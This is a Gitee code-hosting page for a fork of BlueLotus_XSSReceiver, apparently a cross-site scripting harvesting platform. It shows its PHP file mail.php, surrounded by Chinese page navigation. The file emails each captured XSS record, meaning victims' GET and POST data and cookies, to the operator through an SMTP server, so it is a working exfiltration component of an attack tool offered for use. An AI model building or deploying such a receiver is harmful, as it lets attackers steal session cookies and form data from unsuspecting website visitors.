1 Star 0 Fork 7

ctccaozhe / BlueLotus_XSSReceiver

forked from evlon / BlueLotus_XSSReceiver 
加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
克隆/下载
mail.php 1.55 KB
一键复制 编辑 原始数据 按行查看 历史
hyjk555 提交于 2018-05-31 00:16 . Update mail.php
<?php
if (!defined('IN_XSS_PLATFORM')) {
exit('Access Denied');
}
require_once("PHPMailer/PHPMailerAutoload.php");
require_once("load.php");
function send_mail($xss_record_json) {
$subject = "GET:" . count($xss_record_json['get_data']) . "个 POST:" . count($xss_record_json['post_data']) . "个 Cookie:" . count($xss_record_json['cookie_data']) . "个";
$body = json_encode($xss_record_json, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT);
if (!isset($body))$body=json_encode($xss_record_json); //如果PHP 版本低于5.4会不支持json_encode上面的参数.会初始化内容失败.导致无法发送邮件
$body = str_replace("\n", "<br/>", $body);
$body = str_replace(" ", "&nbsp;", $body);
$mail = new PHPMailer(); //实例化
$mail->isSendmail();
$mail->IsSMTP(); // 启用SMTP
$mail->Host = SMTP_SERVER; //SMTP服务器
$mail->Port = SMTP_PORT; //邮件发送端口
$mail->SMTPAuth = true; //启用SMTP认证
$mail->SMTPSecure = SMTP_SECURE;
$mail->CharSet = "UTF-8"; //字符集
$mail->Encoding = "base64"; //编码方式
$mail->Username = MAIL_USER; //你的邮箱
$mail->Password = MAIL_PASS; //你的密码
$mail->Subject = $subject; //邮件标题
$mail->From = MAIL_FROM; //发件人地址(也就是你的邮箱)
$mail->FromName = "通知"; //发件人姓名
$mail->AddAddress(MAIL_RECV); //添加收件人(地址,昵称)
$mail->IsHTML(true); //支持html格式内容
$mail->Body = $body;
$mail->Send();
}
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
JavaScript
1
https://gitee.com/ctccaozhe/BlueLotus_XSSReceiver.git
git@gitee.com:ctccaozhe/BlueLotus_XSSReceiver.git
ctccaozhe
BlueLotus_XSSReceiver
BlueLotus_XSSReceiver
master

搜索帮助

344bd9b3 5694891 D2dac590 5694891